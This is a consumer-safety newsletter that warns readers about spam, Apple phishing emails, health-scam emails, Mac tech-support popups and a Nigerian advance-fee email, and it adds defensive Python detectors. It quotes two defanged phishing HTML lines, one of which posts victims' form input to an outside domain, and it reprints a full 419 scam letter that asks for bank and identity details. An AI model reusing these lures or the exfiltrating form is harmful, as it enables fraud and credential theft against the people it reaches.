
February 24, 2016

THE WEEK IN REVIEW

During the past week criminals have been pushing out lots of scams across all media. People have informed us of scams through Craigslist, Care.com, Facebook, email and texting. Why does it seem impossible for our law enforcement, or the companies who own or host these services, to do anything to slow these daily threats? Here’s one small example that appeared on Facebook recently. A reader sent us this graphic of a “sponsored” ad suggesting that Sylvester Stallone had died. Unfortunately, the TDS reader didn’t send the link for us to investigate. Therefore we cannot be certain what type of threat or scam this was, but typically junk like this is just another social engineering trick to produce a click that results in a computer infection.

1-Facebook social engineering

Here are two other scams that have appeared on Facebook and were documented by the good folks at Sophos.com:

https://nakedsecurity.sophos.com/2015/09/21/guess-what-facebook-dislike-scams-are-back/

https://nakedsecurity.sophos.com/2015/06/11/watch-out-for-acai-berry-scams-on-facebook/

Dangerous social engineering tricks have been sharply on the rise. Visit our latest feature article titled “Social Engineering At Its Worst.”

Sample Scam Subject Lines:

Alert: Policy for Auto Warranty expired

Alert: Your Direct Deposit (business account)

Don’t Ignore This!!!

Ending Soon: Your Kohl’s $50 gift

Get The Facts On cancer-Treatment

High Blood Sugar Secret Discovered (Medical Breakthrough)

How Millions of Homeowners are Lowering Their Payments

How to Protect Your Pets For illness And Injury Low – cost Animal Insurance

School of Trades Gunsmithing–Schools

See The Grand Canyon—By helicopter

You And I Were Never Meant To See This

Your Offer Expires Tonight!

Your Sam’s Club $50 voucher

Sample Scam Email Addresses:

AcceleratedTeachingCertification@faimpic.download

AutoInsuranceUpdate@mtako.tfutile.top

BeverlyHillsM.D.@1kinz.top

CreditCardOffers@retrademl.download

Diabetes_Video@bhuka.adoreda.top

Dr.Trim@1cato.top

EmergencyPlumbing@simplefiles.top

HealthTips@townstral.top

Heart-Attack-Prevention@hygf.tenearu.top

JenniferLopezRadiantComplexion@vcjk.ogvalued.top

OnlineBackgroundCheck@nonindividualistic-com.top

PsoriasisMiracle@ljnov.download

TaxProgramsOnline@stereochromatically-com.top


Phish NETS: Multiple Apple Attacks!

Criminals have been heavily targeting Apple account holders. We found several different phishing attacks and, if you read our “For Your Safety” column below, you’ll also see several phony Apple computer tech support scams.

Look closely at these first two phishing emails and you’ll see that they don’t come from Apple.com even though the sender appears to be “Apple Support.” The first email is actually sent from verification@support.com and the second from verification@up.com. “Dear Customer, we’ve detected a slight error regarding your GSX.” And “New API info for your account.” Criminals often target Apple GSX accounts (Apple Global Service Exchange), which are special accounts offered to licensed Apple technicians around the world. The attached file “form_attached.shtml” is a web document and very dangerous to open. We found two lines of code in the document connecting to very suspicious domains that are not owned by Apple Computer:

  1. This line of code (disabled here) loads a JavaScript file from a hacked medical website: <script language="JavaScript" src="xxxx://statcorpmedical.com/avactis-themes/system/js/gen_validatorv4.js" type="text/javascript" xml:space="preserve"></script>
  2. This line of code (disabled here) posts all the information the victim types into the form to an unrelated website called 123qzz.net, whose front page displays a lot of Chinese characters: <form id="form1" name="form1" action="xxxx://123qzz.net/ok.php" method="post" onSubmit=" return submitOnce(event); setFDC()">

Just delete!

2-Phish-Apple Support news alert

3-Phish-AppleSupport

Then there was this weird Apple phishing email that begins with… “Information about you! Please take a moment and help us in order to continue your service.” A mouse-over of the link “continue” points to a website called nfloridahook.com, a fish restaurant’s website that was hacked. You’ll see below that VirusTotal.com reports that the security vendor Fortinet has identified this domain and link as a phishing site.

Delete!

4-Phish-Apple-Information about you

5-Phish-Apple-Information about you2

Your Money: Brake Repairs, Get Moving Quotes, Home Warranty Insurance, and Quality Used Cars

Just because a solicitation on the Internet looks sophisticated and well-crafted doesn’t mean it is legitimate. Take these examples. In the first we’re told we can find “Brake Repairs For Less with Coupons.” The email comes from autorepaircoupons@bestrepair.click. It sounds and looks so legitimate on the surface. But let’s dig a bit deeper… A WHOIS lookup shows that the domain bestrepair.click was registered within minutes of the email being sent out. A screenshot of the website captured for the WHOIS registration seems to show YouTube. What about the “unsubscribe” text at the bottom for a company called AVP Digital Media in New York? We can’t find any website for this business using Google, but we found information identifying a business of that name in Bhopal, India. We also see that AVP Digital Media owns a variety of odd domains, some related to other scams, such as the next image of the email offering help finding home movers as well as the email below for “Quality Used Cars.” All three domains were registered with Alpnames by someone named “Nitin Sharma.” A search for him and AVP Digital Media also links to businesses in India. And then there is the hidden random white text at the bottom of the email, meant to fool antispam servers. Tricks like that don’t inspire confidence in the legitimacy of the email either.

6-Brake repairs for less with coupons

7-Get Moving Quotes

9-Find quality used cars

How about this email about “Home Warranty Insurance Plans” offering the first month free? It looks very professionally crafted as well and comes from HomeRepairGuard@homewaranty.date. (Notice the misspelling of “warranty.”) Of course, the domain homewaranty.date was registered on February 16 through Alpnames by Raj Singh from Airtel Enterprise. We just wrote about Mr. Singh, Airtel Enterprise and “Free Bird Research” in our Top Story last week regarding student loan payoff scams.

Delete!

8-Home Warranty Insurance Plans


TOP STORY: Criminals Target Those With Health Problems

The top criminal gangs responsible for the majority of malicious emails against United States citizens often target people suffering from health-related problems. And the most common health issue they use as a means to engineer a click is diabetes. We find their behavior even more despicable for preying upon those who are vulnerable because they may be looking for relief from their health problems.

Below is a list of the health-related issues found among 1000 malicious emails collected during a recent three-day period from just one honeypot email server:

Acid reflux

Alcohol addiction

Amphetamine abuse

ADHD

Alzheimer’s

Constipation

COPD and Pulmonary Diseases

Dental implants/Dentures

Diabetes

Drug rehabilitation

Fatigue

Gout

Heart problems

Heartburn

High blood pressure

Hypothyroidism

Incontinence

Low testosterone

Lung cancer

Melanoma

Multiple sclerosis

Osteoporosis

Overactive bladder

Pain/inflammation

Prostate cancer

Psoriasis

Rheumatoid arthritis

Stress

Stroke

Toe and Knee treatment options

Weight loss / Body weight

Here are three examples of these scam emails. The first appears to cite an article from “CBS Health News” with the headline “This ended my diabetes symptoms in days.” The email comes from, and has links to, the domain solutdiab.click. A simple WHOIS lookup of this domain reveals that it was registered through Alpnames by someone named Rupali Gupta from Pune, India on the day the email was sent. The website is hosted in Murcia, Spain. Here is some of the text hidden in the lower blue box at the bottom of the email:

/ask /augmenter /sicuro /sid /tas ks /feeds /sigh /Saving swe /namely /2501 /inspire /dalla /suffic ient /Reply /evaluation /uvm on /Med /saving /ration /old /saat /ISO /3042 Howells /general /Thank /multiplies /led /JENNIFER /second /lyngbyeae /d isastrous OK /XX /axhwjvf /regular /al /PermSize /3D3D128m /desto /beenBelleville /Iran James /verdriet /Moz /other /p arliamentarians /scroll

10-This ended my diabetes
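The hidden filler quoted above (and the “hidden random white text” mentioned under Your Money) is invisible to the reader but not to a mail filter that only reads the HTML. Here is an added Python example, not from the newsletter, that pulls such text out of a message with the standard-library HTML parser and flags the slash-separated filler pattern; the sample message and the list of hiding styles are constructed assumptions:

```python
import re
from html.parser import HTMLParser

# Inline styles that make text invisible on a white page background (assumption).
INVISIBLE = (r"color\s*:\s*(#fff(fff)?|white)\b", r"font-size\s*:\s*0",
             r"display\s*:\s*none", r"visibility\s*:\s*hidden")
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link"}  # never get a closing tag

class HiddenTextFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.stack = []   # one flag per open element: did it start hiding?
        self.depth = 0    # > 0 while inside at least one hidden element
        self.hidden = []

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        style = (dict(attrs).get("style") or "").lower()
        hides = any(re.search(p, style) for p in INVISIBLE)
        self.stack.append(hides)
        self.depth += hides

    def handle_endtag(self, tag):
        if tag not in VOID_TAGS and self.stack:
            self.depth -= self.stack.pop()

    def handle_data(self, data):
        if self.depth and data.strip():
            self.hidden.append(" ".join(data.split()))

def hidden_text(html: str) -> list:
    finder = HiddenTextFinder()
    finder.feed(html)
    return finder.hidden

def looks_like_filler(text: str) -> bool:
    """Filler of the '/word /word' kind quoted above: most tokens start with '/'."""
    tokens = text.split()
    return len(tokens) >= 10 and sum(t.startswith("/") for t in tokens) / len(tokens) > 0.7

# Constructed sample modelled on the diabetes email described above.
SAMPLE = """<html><body><p>This ended my diabetes symptoms in days.
<a href="xxxx://solutdiab.click/">Read the story</a></p>
<div style="color:#ffffff;font-size:1px">/ask /augmenter /sicuro /sid /tasks
/feeds /sigh /Saving /namely /2501 /inspire /dalla</div></body></html>"""

if __name__ == "__main__":
    for chunk in hidden_text(SAMPLE):
        print("hidden:", chunk[:50], "| filler:", looks_like_filler(chunk))
```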

This next email leads you to believe it can help you “treat your acid reflux.” It offers a link to a “free video that will reveal 1 unusual tip to quickly cure your acid reflux & enjoy permanent freedom from heartburn.” The domain certainly looks official: acidreflux.click. Once again, a WHOIS lookup reveals a great deal about this fraud. Check it out for yourself. The domain was registered the day the email was sent by someone named Amit from Indore, India. The website title is YouTube and it is hosted on a web server in Canterbury, England. Here is yet another scam pretending to represent an article from Harvard University, the “United States Journal of Medicine” and a study from NASA on how to cure diabetes in just 3 weeks (or 14 days!). It’s pretty bizarre…

11-Harvard article -cure diabetic decay

12-Treat your acid reflux

And finally, this email claims to connect those with COPD to leading lung and respiratory physicians. The email is associated with the domain bestsiteusa.top. By now you know the drill. A WHOIS lookup shows that the domain was registered the day the email was sent by someone listed only as “R R” from a company in Houston, Texas called “Digital Technical.” Google can’t find any such company in Houston, Texas or anywhere else. The WHOIS shows the phone number for Digital Technical as 2222222. Doesn’t this inspire medical confidence?

Delete!

13-COPD
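The WHOIS “drill” repeated across these emails, as an added Python example that is not from the newsletter: parse the message, collect the sender’s domain and every linked host, and flag any whose creation date sits within a few days of the message’s Date header. WHOIS_CREATED is a constructed table standing in for a live WHOIS query, and the sample email is constructed:

```python
import re
from datetime import date, timedelta
from email import message_from_string
from email.utils import parseaddr, parsedate_to_datetime

# Constructed stand-in for a live WHOIS query (assumption): domain -> creation date.
WHOIS_CREATED = {
    "solutdiab.click": date(2016, 2, 22),   # constructed: registered the day it was sent
    "cbsnews.com": date(1995, 4, 27),       # constructed: a long-established domain
}
MAX_AGE_DAYS = 7   # registered this close to the send date is a red flag

# Constructed sample modelled on the diabetes email described above.
SAMPLE_EMAIL = """\
From: "CBS Health News" <health@solutdiab.click>
Date: Mon, 22 Feb 2016 09:14:00 -0500
Subject: This ended my diabetes symptoms in days
Content-Type: text/html

<p>Read the story at http://solutdiab.click/story and http://www.cbsnews.com/</p>
"""

def domains_in(msg) -> set:
    """Sender domain plus every host linked in the body, lowercased."""
    found = {parseaddr(msg["From"])[1].rpartition("@")[2].lower()}
    body = msg.get_payload(decode=True).decode("utf-8", "replace")
    found.update(h.lower() for h in re.findall(r"https?://([A-Za-z0-9.-]+)", body))
    return {h for h in found if h}

def registrable(host: str) -> str:
    """Drop a leading 'www.' so the WHOIS table is keyed by the registered name."""
    return host[4:] if host.startswith("www.") else host

def freshly_registered(raw: str, max_age_days: int = MAX_AGE_DAYS) -> list:
    """Return the domains whose creation date is within max_age_days of the Date header."""
    msg = message_from_string(raw)
    sent = parsedate_to_datetime(msg["Date"]).date()
    flagged = []
    for host in sorted(domains_in(msg)):
        created = WHOIS_CREATED.get(registrable(host))
        if created is None:
            continue   # unknown to the table: cannot judge, so do not flag
        if abs(sent - created) <= timedelta(days=max_age_days):
            flagged.append(host)
    return flagged

if __name__ == "__main__":
    print(freshly_registered(SAMPLE_EMAIL))   # ['solutdiab.click']
```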



FOR YOUR SAFETY: Apple Tech Support

When most people think about tech support scam calls, they think of scams targeting Windows users. (Read this article on these scams from Woody Leonhard of the Windows Secrets Newsletter.) However, we’ve been seeing a rise in these scams targeting Apple Computer users and several months ago published a feature article about them here. This past week we had several TDS readers send us new Apple Mac tech support scams.

This first one came as a popup in Safari and pointed to a domain called syscarewarning.info. The popup tries to convince the computer owner that there is a serious issue with his or her computer and to call the toll-free number 855-908-3826.

14-Apple Tech Support Scam

Then came these two more sophisticated popups from another TDS reader. They try a different tack in the first popup, saying “It appears that your computer and Internet browser have POP UP SOFTWARE enabled. Please call TOLL-FREE to DISABLE POP-UP AD SOFTWARE NOW: 866-405-2214.”

The popup scam is from a website identified as hh2m.com.

15-MacSupportScam

The next popup was from the domain windlap.net. Don’t be misled because it begins with the subdomain apple.windlap.net. Anyone can create a subdomain that says anything. A subdomain always precedes the registered domain name, so “apple” at the front tells you nothing about who owns windlap.net. In this case, the popup urges the visitor to call 855-539-5528, and also provides live chat “tech support.”

16-MacSupportScam2
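The subdomain point above, as an added Python example that is not from the newsletter: given a hostname from a popup, a link or a sender address, find the registered domain (the public suffix plus one label) and check whether it really is the brand it pretends to be. PUBLIC_SUFFIXES is a small constructed stand-in for the Public Suffix List, which a real check should load in full:

```python
from urllib.parse import urlsplit

# Constructed stand-in for the Public Suffix List (assumption): a real check
# should load the full list, which has thousands of entries such as "co.uk".
PUBLIC_SUFFIXES = {"com", "net", "org", "info", "top", "click", "download",
                   "date", "co.uk"}

def hostname_of(target: str) -> str:
    """Hostname of a URL, a bare hostname, or an e-mail address, lowercased."""
    if "://" not in target:
        target = "//" + target.rpartition("@")[2]   # bare host or user@host
    host = urlsplit(target).hostname or ""
    return host.rstrip(".").lower()

def registrable_domain(target: str) -> str:
    """The public suffix plus the one label to its left: what the owner registered.
    Everything further left is a subdomain the owner can name however they like."""
    labels = hostname_of(target).split(".")
    for i in range(len(labels) - 1):          # scanning from the left, the longest suffix wins
        if ".".join(labels[i + 1:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i:])
    return ".".join(labels)

def is_brand_domain(target: str, brand_domain: str) -> bool:
    """True only when the registered domain itself is the brand's domain."""
    return registrable_domain(target) == brand_domain.lower()

if __name__ == "__main__":
    # Hostnames and senders taken from this issue; apple.com is the real brand.
    for sample in ("apple.windlap.net", "https://support.apple.com/",
                   "syscarewarning.info", "verification@support.com"):
        print(f"{sample:32} -> {registrable_domain(sample):20} "
              f"Apple? {is_brand_domain(sample, 'apple.com')}")
```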

Obviously, none of the domains in these tech support scams is apple.com. A WHOIS lookup of the three domains reveals precious little information, and two of the three were registered through proxy services, so we’ll never learn anything further. On the other hand, if you search Google for each of the first two phone numbers offered for tech support, you’ll see lots of links discussing this scam, the malware related to it, and how to remove it.

https://www.google.com/?gws_rd=ssl#q=855-908-3826

https://www.google.com/?gws_rd=ssl#q=866-405-2214

The last phone number, 855-539-5528, actually has few links related to it from a Google search, but they do include the scammer’s website at windlap.net. Don’t visit it! And never believe these popups! The populations most vulnerable to these scams are the elderly and the young. Help educate them to avoid this nonsense.

ON THE LIGHTER SIDE: Payment to those impacted by Lottery Scams

Finally recompense! The Nigerian President himself has recognized the scams that have targeted Americans and he is going to make it right! All victims are entitled to compensation for the many Nigerian 419 scams we’ve suffered. Can’t wait to get our payout!

From:  admin@HULISA.COM
Time:   2016-02-17 21:26:21

Subject: IMMEDIATE RELEASE OF YOUR CONTRACT PAYMENT/INHERITANCE FUND/SCAM/LOTTERY VICTMS

The President,Federal Republic of Nigeria , Mr.Mohammadu Buhari(GCFR) and the Governor of Central Bank Of Nigeria , Mr.Godwin Emefiele in Conjunction with the Board Of Directors of the Central Bank of Nigeria held a meeting last week concerning contract payment release, both foreign and local contracts and some inheritance funds.

On going through contracts file, we discovered that your file was dumped untreated.At this juncture, we apologize for the delay of US$32,500,000.00(Thirty Two Million Five thousand United States Dollars Only)of your contract payment/Inheritance fund.To enable us to carry on the release of this fund to you,we advise you to stop communicating with any other office now to avoid jeopardising with your fund and attention to the appointed office below for you to receive your payment accordingly.

Now your new Payment Reference No.-35460021, Allocation No: 674632 Password No : 339331 , Pin Code No: 55674 and your Certificate of Merit Payment No : 103 , CBN Released Code No: 0763; Immediate Telex confirmation No: -1114433 ; Secret Code No: XXTN013, Having received these vital payment number.Therefore ,You are qualified now to received and confirm Your payment with the Federal Government of Nigeria through the appointed paying bank immediately and you will have this fund into your bank account within the next 24hrs .

Now you are directed to contact the Director of African Development Bank Group Mr.Douglas Benson immediately you receive this mail so that he will release your fund to you and fax you the payment Copy Slips and also you should reconfirm your Banking Details,Personal Informations for easy communications,Using the Secret Code No:(XXTN014), this is to avoid mistake while transferring your contract payment to you today .Ensure that you quote the Secret Code as:(XXTN014) while send your mail alongside with your informations to the paying bank as directed.

Contact Person: Mr.Douglas Benson(Director,International Remittance Department,Email:adbgbankplcadbg@rocketmail.com, Tel:+234-705-329-4014.Contact him now and inform him that you received a message from the President Federal Republic Of Nigeria, Instructing you to contact him for immediate release of your contract payment and forward your Details to his office to avoid transfer mistake such as

Your Bank Name:
Your Bank Address:
Your Bank Account No:
Routing No:

Swift Code No:
Account Name:

Full Name:
Home Address:

Your Direct Tel,Mobile & Fax No:
Age & Occupation :

A Copy of International Passport/Driving Licence

NOTE : We have mounted our security network to monitor every in-coming calls and emails , if we still find out that you are still dealing with all those fraudsters,Impostors,Scammers that have been frustrating your life for years , I shall stop and cancel your payment immediately .

You have being approved to receive US$32,500,000.00 as your Contract/Inheritance payment from the African Development Bank Group.So,call Mr.Douglas Benson on his direct telephone number +234-8152460511 upon the receipt of the mail to confirm the mail to him very important.On behalf of the United Nations, I hereby extend my sincere invitation to you, to come and invest in any part of the World’s economy as soon as your fund is paid to you.


Best Regards

Mr.Mohammadu Buhari(GCFR)
PRESIDENT FEDERAL GOVERNMENT OF NIGERIA


Until next week, surf safely!